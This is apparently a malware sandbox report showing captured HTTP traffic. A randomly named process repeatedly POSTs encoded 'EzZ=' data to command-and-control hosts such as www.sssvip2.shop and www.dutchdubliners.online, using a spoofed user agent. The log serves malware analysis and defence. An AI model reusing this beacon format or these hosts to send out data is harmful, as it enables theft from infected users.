                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                    Data Raw: 45 7a 5a 3d 42 61 55 32 4b 42 56 4f 30 6b 66 45 66 6a 5a 74 64 36 55 4e 38 2f 56 36 7a 52 74 70 72 38 44 42 45 72 56 66 44 50 4d 52 67 4a 56 39 4b 6c 48 6f 32 50 53 2f 50 6a 62 66 6b 35 74 51 6b 49 2b 71 74 49 4e 32 4b 6d 6f 63 34 54 41 69 44 50 65 65 71 77 37 67 53 4b 59 4d 4f 6c 77 41 6e 6b 41 33 55 6f 59 67 66 39 6a 55 74 6f 73 70 6a 66 66 42 71 62 73 6b 51 51 44 42 43 4f 43 44 61 36 49 4b 54 57 76 79 37 73 34 76 48 38 79 5a 42 5a 59 70 78 6d 44 79 6e 50 4a 65 36 67 44 70 6c 34 6d 30 30 4b 6a 62 4b 42 72 55 78 6a 71 66 44 74 30 72 30 4a 54 2b 4b 78 75 5a 66 2b 70 62 30 4a 54 44 30 36 65 45 56 73 33 65 66 75 36 56 4d 2b 69 36 46 5a 4b 61 76 31 6f 3d
                                                                                                                                    Data Ascii: EzZ=BaU2KBVO0kfEfjZtd6UN8/V6zRtpr8DBErVfDPMRgJV9KlHo2PS/Pjbfk5tQkI+qtIN2Kmoc4TAiDPeeqw7gSKYMOlwAnkA3UoYgf9jUtospjffBqbskQQDBCOCDa6IKTWvy7s4vH8yZBZYpxmDynPJe6gDpl4m00KjbKBrUxjqfDt0r0JT+KxuZf+pb0JTD06eEVs3efu6VM+i6FZKav1o=


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    7192.168.2.450015156.253.8.115805780C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Jan 10, 2025 19:46:59.568818092 CET10854OUTPOST /6t0f/ HTTP/1.1
                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                    Host: www.sssvip2.shop
                                                                                                                                    Origin: http://www.sssvip2.shop
                                                                                                                                    Content-Length: 10300
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Connection: close
                                                                                                                                    Referer: http://www.sssvip2.shop/6t0f/
                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                    Data Raw: 45 7a 5a 3d 42 61 55 32 4b 42 56 4f 30 6b 66 45 66 6a 5a 74 64 36 55 4e 38 2f 56 36 7a 52 74 70 72 38 44 42 45 72 56 66 44 50 4d 52 67 4a 64 39 4b 53 76 6f 33 75 53 2f 4d 6a 62 66 36 4a 74 56 6b 49 2f 36 74 49 6c 79 4b 6d 31 6a 34 52 49 69 43 70 4b 65 76 43 54 67 59 4b 59 4d 52 31 77 4e 36 30 41 75 55 73 30 6b 66 39 54 55 74 6f 73 70 6a 64 48 42 6f 4b 73 6b 44 67 44 47 53 65 43 50 65 36 49 79 54 57 47 46 37 73 39 55 48 4d 53 5a 41 35 49 70 33 53 6a 79 6c 76 4a 63 39 67 43 71 6c 34 69 72 30 4b 4f 71 4b 43 32 44 78 67 32 66 48 37 31 41 74 5a 62 78 57 44 75 51 4d 66 78 73 7a 35 58 65 30 72 32 54 46 63 76 55 45 50 6e 69 47 39 62 32 51 70 36 5a 36 42 72 37 6a 4a 49 55 2b 4d 35 71 4a 75 56 48 51 67 51 47 76 72 4f 61 31 6f 71 6b 54 51 53 6c 56 62 35 57 54 65 36 71 6f 72 4a 4a 31 30 59 51 50 50 39 53 78 65 71 50 33 2b 4f 68 65 71 37 33 53 4b 76 65 6f 56 74 32 4c 53 71 39 79 73 74 4a 4e 56 46 68 36 6b 59 52 4c 55 6b 51 6f 37 41 35 37 6e 45 68 4f 58 39 6e 4b 55 43 78 46 46 35 6a 6c 30 6c 42 6d 4d 48 57 31 46 [TRUNCATED]
                                                                                                                                    Data Ascii: EzZ=BaU2KBVO0kfEfjZtd6UN8/V6zRtpr8DBErVfDPMRgJd9KSvo3uS/Mjbf6JtVkI/6tIlyKm1j4RIiCpKevCTgYKYMR1wN60AuUs0kf9TUtospjdHBoKskDgDGSeCPe6IyTWGF7s9UHMSZA5Ip3SjylvJc9gCql4ir0KOqKC2Dxg2fH71AtZbxWDuQMfxsz5Xe0r2TFcvUEPniG9b2Qp6Z6Br7jJIU+M5qJuVHQgQGvrOa1oqkTQSlVb5WTe6qorJJ10YQPP9SxeqP3+Oheq73SKveoVt2LSq9ystJNVFh6kYRLUkQo7A57nEhOX9nKUCxFF5jl0lBmMHW1FxPMdQvUevCMdb8j4dUcpzewINVKqkpcUBOqilMl8yC7z9QSDXbfnWBha4hRH92pnvc5fsW1Ff1scCZgJUf/MS9ic1OlquFE2nWXpXpYgjaEazOS/17HT3hki4DuWVK8bLp8clePgDqWUBtiwKxbs7eqY6CQ8ct6pm2QnRmg6m8b9Qs0Xkymh8P/TecfTAzg0jrD0TPerVMGiVXnXY4edX2zVVl9xPeugLasFOdVNUbCSX8oNCU27Iok79i2yg4SmpU7srkoOUvO2ijqcQ9B2Tar5+GDB/k8cykmhJaZwjoDAxeSiJ8KvzBztZtkKaVDEBbCWcYFdDgDijf0bu02urqe/vciV9P3TaqFJUCVYIWMWYJBD13qdu4FNbF0EtCMUZ6rEB5PqVp7zLxDwDAFopZ/hl5/Auyccr6Eza3SxK2yz81gGbPFTN3qG4Jsx440grSTkvYHtG5aIYo9Qqtqu6uhmVsu91VJTTpkHQeWanaZ7pQx5eoj4cs9rZOd8Qx4+Tjl7fMtjh2+v5/NmglBlIaePbwOoDPPI9CUq4vZwqpABsMm8PNpVgPcks0wumyh2A94ksq2nx6DWnn68KjZhJ60S3Od4T+O8bM8+RG+lV4mYJqyPamTzAk/eqXriStVfZlLksF94XBXTZCAdSyq7fp9LjLV3du2/0z [TRUNCATED]


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    8192.168.2.450016156.253.8.115805780C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Jan 10, 2025 19:47:02.111824036 CET497OUTGET /6t0f/?EzZ=MY8WJ01352TVXzFsNodd1NxUli1E4sLIDPBPQPgfoKZiJVfQ3vqQHTL/6etRwfvFnZBRJEUa5B9wCMX79XLhBfQQAkU843AvbtgeEKbWrrYxtYrhlbwkADc=&BjRxb=8r70fhQxdN4lRB HTTP/1.1
                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                    Host: www.sssvip2.shop
                                                                                                                                    Connection: close
                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    9192.168.2.45001737.97.254.27805780C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Jan 10, 2025 19:47:28.590451956 CET779OUTPOST /7ujc/ HTTP/1.1
                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                    Host: www.dutchdubliners.online
                                                                                                                                    Origin: http://www.dutchdubliners.online
                                                                                                                                    Content-Length: 200
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Connection: close
                                                                                                                                    Referer: http://www.dutchdubliners.online/7ujc/
                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                    Data Raw: 45 7a 5a 3d 62 74 71 41 35 2b 58 67 44 58 6e 75 2f 77 63 76 7a 46 57 53 33 73 6e 55 39 70 79 79 38 6f 41 31 42 4a 75 6c 6a 76 4a 34 56 36 6f 63 68 64 69 6c 56 57 6d 65 4b 30 56 43 34 36 54 37 73 34 30 6f 5a 2b 49 54 31 69 47 6c 38 6a 37 76 49 44 58 7a 41 6d 75 6d 6d 70 71 6a 4b 73 66 6a 58 39 52 44 6c 4b 32 2f 66 77 49 4b 44 79 53 64 58 74 74 4a 2b 32 33 45 41 4a 68 6e 46 7a 4e 65 39 55 6b 78 41 49 31 4e 68 56 55 70 44 73 70 31 48 6c 79 6e 43 75 46 31 75 53 32 6b 30 66 63 53 36 42 56 58 2b 43 56 6d 45 30 73 72 38 6c 7a 44 6c 6d 55 61 54 61 64 6e 32 71 37 5a 49 50 69 32 47 6e 30 50 64 51 3d 3d
                                                                                                                                    Data Ascii: EzZ=btqA5+XgDXnu/wcvzFWS3snU9pyy8oA1BJuljvJ4V6ochdilVWmeK0VC46T7s40oZ+IT1iGl8j7vIDXzAmummpqjKsfjX9RDlK2/fwIKDySdXttJ+23EAJhnFzNe9UkxAI1NhVUpDsp1HlynCuF1uS2k0fcS6BVX+CVmE0sr8lzDlmUaTadn2q7ZIPi2Gn0PdQ==
                                                                                                                                    Jan 10, 2025 19:47:29.200200081 CET188INHTTP/1.0 403 Forbidden
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Connection: close
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    10192.168.2.45001837.97.254.27805780C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Jan 10, 2025 19:47:31.132036924 CET799OUTPOST /7ujc/ HTTP/1.1
                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                    Host: www.dutchdubliners.online
                                                                                                                                    Origin: http://www.dutchdubliners.online
                                                                                                                                    Content-Length: 220
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Connection: close
                                                                                                                                    Referer: http://www.dutchdubliners.online/7ujc/
                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                    Data Raw: 45 7a 5a 3d 62 74 71 41 35 2b 58 67 44 58 6e 75 35 54 55 76 78 69 4b 53 6d 38 6e 58 79 4a 79 79 32 49 41 70 42 4a 71 6c 6a 72 51 2f 4a 59 4d 63 76 63 53 6c 55 55 4f 65 48 55 56 43 7a 61 54 36 78 6f 30 6a 5a 2f 30 6c 31 67 69 6c 38 67 48 76 49 42 50 7a 44 58 75 6c 30 70 71 68 52 63 66 39 49 74 52 44 6c 4b 32 2f 66 30 68 76 44 79 4b 64 55 64 39 4a 2f 58 33 46 4b 70 68 6d 4e 54 4e 65 73 6b 6b 31 41 49 31 37 68 51 39 30 44 75 52 31 48 6e 36 6e 42 2f 46 30 6b 53 32 59 70 50 63 45 7a 6c 59 4d 7a 69 45 4a 44 33 38 36 33 46 2f 2b 6b 67 5a 41 43 72 38 77 6b 71 66 71 56 49 72 43 4c 6b 4a 47 47 63 73 39 4d 5a 31 52 39 4d 69 72 43 68 47 56 54 69 57 65 55 64 49 3d
                                                                                                                                    Data Ascii: EzZ=btqA5+XgDXnu5TUvxiKSm8nXyJyy2IApBJqljrQ/JYMcvcSlUUOeHUVCzaT6xo0jZ/0l1gil8gHvIBPzDXul0pqhRcf9ItRDlK2/f0hvDyKdUd9J/X3FKphmNTNeskk1AI17hQ90DuR1Hn6nB/F0kS2YpPcEzlYMziEJD3863F/+kgZACr8wkqfqVIrCLkJGGcs9MZ1R9MirChGVTiWeUdI=
                                                                                                                                    Jan 10, 2025 19:47:31.713006973 CET188INHTTP/1.0 403 Forbidden
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Connection: close
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    11192.168.2.45001937.97.254.27805780C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Jan 10, 2025 19:47:33.679908991 CET10881OUTPOST /7ujc/ HTTP/1.1
                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                    Host: www.dutchdubliners.online
                                                                                                                                    Origin: http://www.dutchdubliners.online
                                                                                                                                    Content-Length: 10300
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Connection: close
                                                                                                                                    Referer: http://www.dutchdubliners.online/7ujc/
                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                    Data Raw: 45 7a 5a 3d 62 74 71 41 35 2b 58 67 44 58 6e 75 35 54 55 76 78 69 4b 53 6d 38 6e 58 79 4a 79 79 32 49 41 70 42 4a 71 6c 6a 72 51 2f 4a 59 45 63 76 75 61 6c 56 31 4f 65 49 30 56 43 74 71 54 33 78 6f 30 45 5a 2b 63 35 31 67 65 66 38 6c 44 76 4a 6b 62 7a 55 56 47 6c 2b 70 71 68 5a 38 66 38 58 39 52 73 6c 4f 62 58 66 77 46 76 44 79 4b 64 55 65 56 4a 32 6d 33 46 4d 70 68 6e 46 7a 4e 6f 39 55 6c 53 41 49 73 4f 68 51 77 44 43 66 78 31 48 45 53 6e 41 4a 52 30 73 53 32 61 71 50 64 48 7a 69 51 70 7a 6a 6f 76 44 30 67 51 33 48 6a 2b 6b 68 6b 4a 54 34 63 50 2f 38 50 51 50 34 76 78 54 48 68 67 48 2f 64 47 45 5a 6c 64 6e 34 75 47 59 78 69 46 57 41 75 48 49 6f 55 4f 37 67 68 69 74 61 57 6e 4e 58 63 73 50 4b 49 6a 42 73 63 47 71 67 59 32 49 44 6f 39 4a 72 33 35 2b 43 39 33 68 61 39 61 46 65 38 56 53 77 58 6f 79 50 79 6c 65 2f 46 6f 4c 4f 63 65 56 6b 56 79 6b 50 55 48 64 74 38 4f 52 76 76 6f 6e 4b 70 4f 2b 7a 6c 46 66 6b 50 36 6e 6b 75 59 32 4b 67 57 4d 65 54 6a 41 70 77 53 75 45 46 72 4a 44 4d 46 77 4b 30 6f 30 68 [TRUNCATED]
                                                                                                                                    Data Ascii: EzZ=btqA5+XgDXnu5TUvxiKSm8nXyJyy2IApBJqljrQ/JYEcvualV1OeI0VCtqT3xo0EZ+c51gef8lDvJkbzUVGl+pqhZ8f8X9RslObXfwFvDyKdUeVJ2m3FMphnFzNo9UlSAIsOhQwDCfx1HESnAJR0sS2aqPdHziQpzjovD0gQ3Hj+khkJT4cP/8PQP4vxTHhgH/dGEZldn4uGYxiFWAuHIoUO7ghitaWnNXcsPKIjBscGqgY2IDo9Jr35+C93ha9aFe8VSwXoyPyle/FoLOceVkVykPUHdt8ORvvonKpO+zlFfkP6nkuY2KgWMeTjApwSuEFrJDMFwK0o0hO4ZUQ4n+duhjKLltVaaPeo+nDrwhcS61lnZlRLJaP0LaKLpw4U3U5IewSJDr7V3vzhga3Afrhwyv7/mZw80MOEYGu+dKP8sHib1pV2MjOJZbaYvH9PCoGrh3I3Sz2X0SdCnIBe96WOMDamxfpAFU7ZWD4yV8V6/3bSPPhx/AO+LUedjTN2OYAZvNFEBeTh30XgHQzS096dpmIsfPjogcWS5kHP51CWX69QrJI12HjuNSiZEW/aSKCPxtzDqybxeLJ/7WQbz8HMJA0fmkKN6cnviXo+42gt93ZxSGtn6pzt3e+xmrnWvLgzH4/FDlkqyvO+Xnu4Gz3YX4oWskpkf2GT6ZZ0DXUVOJp6VxggJQRXkHG1d4e/zaUg9KUexD/4hpk8dmTGFNrBobR17uyzvNlFSF6wRC5cFEFrBrSykhinFqCdoyP31sYsOT3ukQbLvPw+xTMdE0ucRf9iwcyOeAXOAAt/7MHYtG7YU8Vnlx2XtzFJ5Qia/ven4jvE85KNaC8rBxDQr+EAdUJhFNHWhZfXPjNvYWOXl6nKNH3zcRW3Qahj3sB9nEju4K+dplCmspypFqEwUtfE8hyZC38g/eaZCBmkGyAH0ppoy94i7BkcGmARnnoeCjtpb2xmtgYWwFRupWtJ9x3+dwl7WNc0DfzGjY/HuW3sz8FW [TRUNCATED]
                                                                                                                                    Jan 10, 2025 19:47:34.298815966 CET188INHTTP/1.0 403 Forbidden
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Connection: close
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    12192.168.2.45002037.97.254.27805780C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Jan 10, 2025 19:47:36.298125982 CET506OUTGET /7ujc/?EzZ=WvCg6J2jHD6L/TcyvzGm/cLTtunIwZsLDJOR2qctLrwbpbWmV0+8HmEyzKPQy50wJfwN5AO63TK9GRaTVCmcnK6BZOflUZJxlriydXV/Hhy/YqFf922rQpM=&BjRxb=8r70fhQxdN4lRB HTTP/1.1
                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                    Host: www.dutchdubliners.online
                                                                                                                                    Connection: close
                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                    Jan 10, 2025 19:47:36.863960981 CET1236INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 02 Apr 2024 11:23:50 GMT
                                                                                                                                    Server: Apache
                                                                                                                                    Last-Modified: Mon, 04 Mar 2024 08:41:05 GMT
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                    X-Varnish: 959150833 34925
                                                                                                                                    Age: 24477826
                                                                                                                                    Via: 1.1 varnish (Varnish/6.1)
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Content-Length: 64674
                                                                                                                                    Connection: close
                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 61 73 63 69 69 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 72 61 6e 73 49 50 20 2d 20 52 65 73 65 72 76 65 64 20 64 6f 6d 61 69 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 72 61 6e 73 49 50 20 2d 20 52 65 73 65 72 76 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 [TRUNCATED]
                                                                                                                                    Data Ascii: <!DOCTYPE html><html> <head lang="en"> <meta charset="ascii"> <title>TransIP - Reserved domain</title> <meta name="description" content="TransIP - Reserved domain"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow"> <link rel="shortcut icon" href="//reserved.transip.nl/assets/img/favicon.ico" type="image/x-icon" /> <link href='https://fonts.googleapis.com/css?family=Source+Sans+Pro:400,900' rel='stylesheet' type='text/css'> <link rel="stylesheet" href="//reserved.transip.nl/assets/css/combined-min.css"> <title>Bezet!</title> </head> <body> <div class="container"> <div role="navigation" class="reserved-nav-container"> <div class="col-xs
                                                                                                                                    Jan 10, 2025 19:47:36.864012957 CET224INData Raw: 2d 36 20 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 6c 65 66 74 20 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 62 72 61 6e 64 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 72 61
                                                                                                                                    Data Ascii: -6 reserved-nav-left reserved-nav-brand"> <a href="https://transip.nl/" class="reserved-nav-brand-link lang_nl" rel="nofollow"> <svg version="1.1" id="transip-logo" xmlns="http://w
                                                                                                                                    Jan 10, 2025 19:47:36.864026070 CET1236INData Raw: 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 78 6d 6c 3a 73 70 61 63 65 3d 22 70 72 65 73 65 72 76 65
                                                                                                                                    Data Ascii: ww.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xml:space="preserve"> <path class="transip-logo-part" d="M12.7,12.4c-0.1,2.5-0.3,2.8-3.2,2.898H8.7c-2.4-0.1-3.1-0.6-3.1-2.699V6.7h9V4.6h-9V1.8H2.9v2.9H0
                                                                                                                                    Jan 10, 2025 19:47:36.864044905 CET1236INData Raw: 2e 38 2c 31 2c 33 2e 36 2c 31 68 35 2e 34 63 32 2e 39 2c 30 2c 34 2d 30 2e 31 39 39 2c 34 2e 36 2d 31 76 30 2e 38 30 31 68 32 2e 37 56 38 2e 38 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 43
                                                                                                                                    Data Ascii: .8,1,3.6,1h5.4c2.9,0,4-0.199,4.6-1v0.801h2.7V8.8 C50.7,5,47.6,4.5,43.4,4.5z"/> <path class="transip-logo-part" d="M69.1,5.7C68.2,4.9,66.7,4.4,64.6,4.4H61.2c-2.5,0-4.3,0.3-5.3,1.8V4.6h
                                                                                                                                    Jan 10, 2025 19:47:36.864063025 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 74 72 61 6e 73 69 70 2d 6c 6f 67 6f 2d 70 61 72
                                                                                                                                    Data Ascii: <g> <rect class="transip-logo-part" x="96.5" fill="#187DC1" width="2.7" height="2.2"/> </g> </g> <g>
                                                                                                                                    Jan 10, 2025 19:47:36.864075899 CET1236INData Raw: 6c 61 6e 67 5f 65 6e 20 68 69 64 64 65 6e 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 69 64 3d 22 74 72 61
                                                                                                                                    Data Ascii: lang_en hidden" rel="nofollow"> <svg version="1.1" id="transip-logo" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xml:space="preserve"> <path class="transip-l
                                                                                                                                    Jan 10, 2025 19:47:36.864089966 CET1236INData Raw: 2d 34 2e 36 2c 30 2e 35 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 2d 31 2e 31 2c 30 2e 34 2d 31 2e 37 2c 31 2e 33 2d 31 2e 37 2c 32 2e 38 76 30 2e 38 63 30 2c 31 2e 32 2c 30 2e 32 2c 32
                                                                                                                                    Data Ascii: -4.6,0.5 c-1.1,0.4-1.7,1.3-1.7,2.8v0.8c0,1.2,0.2,2.102,0.9,2.801c0.7,0.699,1.8,1,3.6,1h5.4c2.9,0,4-0.199,4.6-1v0.801h2.7V8.8 C50.7,5,47.6,4.5,43.4,4.5z"/>
                                                                                                                                    Jan 10, 2025 19:47:36.864101887 CET552INData Raw: 38 39 2e 34 2c 31 30 2e 39 2c 38 38 2e 34 2c 31 30 2e 34 7a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                    Data Ascii: 89.4,10.9,88.4,10.4z" /> <g> <g> <rect class="transip-logo-part" x="96.5" fill="#187DC1" width="2.7" height="2.2"/>
                                                                                                                                    Jan 10, 2025 19:47:36.864115000 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                    Data Ascii: </g> <g> <g> <path class="transip-logo-part" fill="#187DC1" d="M117.3,12.2c0,2.7-1.3,3.1-4,3.1h-4c-2.399,0-4.1-0.399-4.2-3.2
